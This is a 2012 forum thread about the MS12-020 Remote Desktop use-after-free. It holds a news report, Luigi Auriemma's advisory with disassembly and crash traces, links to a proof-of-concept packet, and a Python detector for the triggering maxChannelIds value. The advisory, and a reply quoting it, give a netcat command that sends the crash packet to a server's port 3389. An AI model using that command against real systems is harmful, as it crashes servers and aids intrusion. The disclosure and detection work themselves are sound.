Nytro Posted March 14, 2012

Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately
By Brian Prince on March 13, 2012

Microsoft is urging organizations to apply the sole critical update in this month’s Patch Tuesday release as soon as possible.

The critical bulletin – one of six security bulletins issued as part of today’s release – addresses two vulnerabilities in the Remote Desktop Protocol (RDP).

“A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft’s Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.”

“That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.”

Ben Greenbaum, senior principal software engineer for Symantec’s Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability.

“RDP’s purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.”

Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon’s AWS, need to patch as quickly as possible, Qualys CTO Wolfgang Kandek opined.

“If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft’s NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said.

Besides the RDP bugs, this month’s Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows denial-of-service bugs, which is rated ‘moderate.’

Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild.

Source: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com
Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot
Nytro Posted March 17, 2012

Securitytube Speak Up: The Ms12-020 Fiasco!

Suspicions aroused as exploit for critical Windows bug is leaked (Updated)

http://aluigi.org/adv/ms12-020_leak.txt
Guest expl0iter Posted March 17, 2012

Meh.. no matter how hard Microsoft tries to fix the vulnerabilities in Windows, hackers still find a way to exploit them.
Nytro Posted March 18, 2012

Full disclosure

#######################################################################

Luigi Auriemma

Application:  Microsoft Terminal Services / Remote Desktop Services
              http://www.microsoft.com
              http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
Versions:     any Windows version before 13 Mar 2012
Platforms:    Windows
Bug:          use after free
Exploitation: remote, versus server
Date:         16 Mar 2012 (found 16 May 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
Additional references:
              http://www.zerodayinitiative.com/advisories/ZDI-12-044/
              http://technet.microsoft.com/en-us/security/bulletin/ms12-020

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's homepage:
"The Microsoft Remote Desktop Protocol (RDP) provides remote display and input capabilities over network connections for Windows-based applications running on a server. RDP is designed to support different types of network topologies and multiple LAN protocols."

#######################################################################

======
2) Bug
======

The Remote Desktop Protocol is used by the "Terminal Services / Remote Desktop Services" and works at kernel level on port 3389.

There is a use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value less than or equal to 5.

The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer; the following dump is taken from Windows 2003 Server:

  f761887c 8bff            mov     edi,edi
  f761887e 55              push    ebp
  f761887f 8bec            mov     ebp,esp
  f7618881 56              push    esi
  f7618882 57              push    edi
  f7618883 8b7d08          mov     edi,dword ptr [ebp+8]
  f7618886 8d47ec          lea     eax,[edi-14h]
  f7618889 50              push    eax
  f761888a eb09            jmp     termdd!IcaBufferAlloc+0x19 (f7618895)
  f761888c 8b4618          mov     eax,dword ptr [esi+18h]        ; we are here
  f761888f 833800          cmp     dword ptr [eax],0              ; or here
  f7618892 7527            jne     termdd!IcaBufferAlloc+0x3f (f76188bb)  ; must jump
  f7618894 56              push    esi
  f7618895 e878290000      call    termdd!IcaGetPreviousSdLink (f761b212)  ; the new ESI is returned by this function
  f761889a 8bf0            mov     esi,eax
  f761889c 85f6            test    esi,esi
  f761889e 75ec            jne     termdd!IcaBufferAlloc+0x10 (f761888c)
  f76188a0 ff751c          push    dword ptr [ebp+1Ch]
  f76188a3 ff7518          push    dword ptr [ebp+18h]
  f76188a6 ff7514          push    dword ptr [ebp+14h]
  f76188a9 ff7510          push    dword ptr [ebp+10h]
  f76188ac ff750c          push    dword ptr [ebp+0Ch]
  f76188af 57              push    edi
  f76188b0 e8b9fcffff      call    termdd!IcaBufferAllocInternal (f761856e)
  f76188b5 5f              pop     edi
  f76188b6 5e              pop     esi
  f76188b7 5d              pop     ebp
  f76188b8 c21800          ret     18h
  f76188bb 33c0            xor     eax,eax
  f76188bd 53              push    ebx
  f76188be 8d7e10          lea     edi,[esi+10h]
  f76188c1 40              inc     eax
  f76188c2 f00fc107        lock xadd dword ptr [edi],eax
  f76188c6 ff751c          push    dword ptr [ebp+1Ch]
  f76188c9 8b4618          mov     eax,dword ptr [esi+18h]        ; the same value as before
  f76188cc ff7518          push    dword ptr [ebp+18h]
  f76188cf ff7514          push    dword ptr [ebp+14h]
  f76188d2 ff7510          push    dword ptr [ebp+10h]
  f76188d5 ff750c          push    dword ptr [ebp+0Ch]
  f76188d8 ff761c          push    dword ptr [esi+1Ch]
  f76188db ff10            call    dword ptr [eax]                ; code execution
  f76188dd 8bd8            mov     ebx,eax
  f76188df 83c8ff          or      eax,0FFFFFFFFh
  f76188e2 f00fc107        lock xadd dword ptr [edi],eax
  f76188e6 7506            jne     termdd!IcaBufferAlloc+0x72 (f76188ee)
  f76188e8 56              push    esi
  f76188e9 e8382f0000      call    termdd!_IcaUnloadSd (f761b826)
  f76188ee 8bc3            mov     eax,ebx
  f76188f0 5b              pop     ebx
  f76188f1 ebc2            jmp     termdd!IcaBufferAlloc+0x39 (f76188b5)

  eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
  eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0         nv up ei pl nz na po nc
  cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
  termdd!IcaBufferAlloc+0x10:
  f762888c 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:040b041a=????????

  ChildEBP RetAddr
  b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
  b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
  b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
  b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
  b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
  b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
  b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
  b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
  b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
  b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
  b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
  b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
  b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
  b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
  b8b39bac f762ca10 termdd!_IcaCallStack+0x55
  b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
  b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
  b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
  b8b39c50 808ed4eb nt!IofCallDriver+0x45
  b8b39c64 808ee28d nt!NtWriteFile+0x2943
  b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
  b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
  b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
  b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14

On Windows 2003 the zone of memory pointed to by ESI+18 when using the provided proof-of-concept is always in the range 040b02??-040b04??.

The exploitability depends on the possibility of controlling ESI or the content pointed to by it (maybe via a form of heap spraying?); indeed in my quick tests this zone sometimes is allocated and other times it isn't.

Note that on the post-Vista Windows versions (like 7 and 2008) it "seems" necessary to have "Allow connections from computers running any version of Remote Desktop" enabled for the system to be vulnerable. Anyway I'm not totally sure about this so-called limitation because it looks like it depends on my proof-of-concept only.

The provided proof-of-concept uses the BER integer values set at 32 bit (big endian) in case they could be useful for easier debugging.

Additional details about the protocol:
http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/termdd_1.dat
http://www.exploit-db.com/sploits/18606.dat

  nc SERVER 3389 < termdd_1.dat

Resend it multiple times in case of no results, and note that this is just a simple proof-of-concept packet to quickly test the bug, so it's not optimized at all.

#######################################################################

======
4) Fix
======

http://technet.microsoft.com/en-us/security/bulletin/ms12-020

#######################################################################

Luigi Auriemma FTW!
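Detection-side example added to this thread (it is not Luigi Auriemma's PoC and not taken from the advisory): a parser for the BER-encoded T.125 MCS Connect-Initial PDU that pulls out targetParameters and flags the maxChannelIds <= 5 condition the advisory describes, the kind of check an IDS rule or an RDP-proxy log filter would implement. It assumes a bare MCS PDU with the TPKT and X.224 headers already stripped; the two sample PDUs at the bottom are constructed here, one with the 32-bit BER integer encoding the advisory mentions.

```python
import struct

def ber_len(buf, i):  # BER length at buf[i] -> (length, index after it)
    if buf[i] < 0x80:
        return buf[i], i + 1
    n = buf[i] & 0x7f
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def ber_tlv(buf, i):  # one TLV -> (tag bytes, value bytes, index after it)
    end = i + 2 if (buf[i] & 0x1f) == 0x1f else i + 1  # 0x7f 0x65 is a 2-byte tag
    length, j = ber_len(buf, end)
    return buf[i:end], buf[j:j + length], j + length

FIELDS = ("maxChannelIds", "maxUserIds", "maxTokenIds", "numPriorities",
          "minThroughput", "maxHeight", "maxMCSPDUsize", "protocolVersion")
def domain_parameters(seq):  # the eight INTEGERs of a T.125 DomainParameters
    out, i = {}, 0
    for name in FIELDS:
        tag, val, i = ber_tlv(seq, i)
        if tag != b"\x02":
            raise ValueError("expected INTEGER in DomainParameters")
        out[name] = int.from_bytes(val, "big")  # 1-byte or 32-bit encodings alike
    return out

def target_params(pdu):  # targetParameters of an MCS Connect-Initial (tag 0x7f65)
    tag, body, _ = ber_tlv(pdu, 0)
    if tag != b"\x7f\x65":
        raise ValueError("not a Connect-Initial PDU")
    i = 0
    for _ in range(3):  # skip callingDomainSelector, calledDomainSelector, upwardFlag
        _, _, i = ber_tlv(body, i)
    tag, target, _ = ber_tlv(body, i)
    if tag != b"\x30":
        raise ValueError("expected targetParameters SEQUENCE")
    return domain_parameters(target)

def is_suspicious(pdu):  # the advisory's condition: maxChannelIds <= 5
    return target_params(pdu)["maxChannelIds"] <= 5

# Minimal BER encoder, used only to build the constructed sample PDUs below.
def tlv(tag, body):
    n = len(body)
    return tag + (bytes([n]) if n < 0x80 else b"\x82" + struct.pack(">H", n)) + body

def build_connect_initial(max_channel_ids, int_width=2):
    ints = (max_channel_ids, 2, 0, 1, 0, 1, 4096, 2)  # same params for target/min/max
    seq = tlv(b"\x30", b"".join(tlv(b"\x02", v.to_bytes(int_width, "big")) for v in ints))
    body = tlv(b"\x04", b"\x01") * 2 + tlv(b"\x01", b"\xff") + seq * 3 + tlv(b"\x04", bytes(8))
    return tlv(b"\x7f\x65", body)

NORMAL_PDU = build_connect_initial(34)            # typical client value (constructed)
ODD_PDU = build_connect_initial(5, int_width=4)   # 32-bit BER ints, value 5 (constructed)
```

Real traffic needs the TPKT/X.224 framing removed first and the PDU may use 1-, 2- or 4-byte INTEGER encodings, which is why the parser reads whatever width the length byte announces.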
phreak Posted March 18, 2012

I read it, it says how it's possible but doesn't present an exploit with RCE... only a crash.
Paul4games Posted March 18, 2012

Still waiting for an RCE PoC.

I think this will tell you something:

    3) The Code
    ===========
    http://aluigi.org/poc/termdd_1.dat
    http://www.exploit-db.com/sploits/18606.dat

      nc SERVER 3389 < termdd_1.dat

    resend it multiple times in case of no results and note that this is just a simple proof-of-concept packet to quickly test the bug so it's not optimized at all.

PS: Once this vulnerability is implemented in Metasploit, or some tool is created that uses it, a pile of "private" RDP scanners will appear overnight.
phreak Posted March 18, 2012

Assuming someone managed to achieve RCE privately and that someone will ever publish it.. for now there is no public RCE PoC.

BinaryNinjas | Reversing and stuff…
Private Paste - Pastie
Nytro Posted March 18, 2012

There is one on a Chinese hosting site, but I haven't tried it.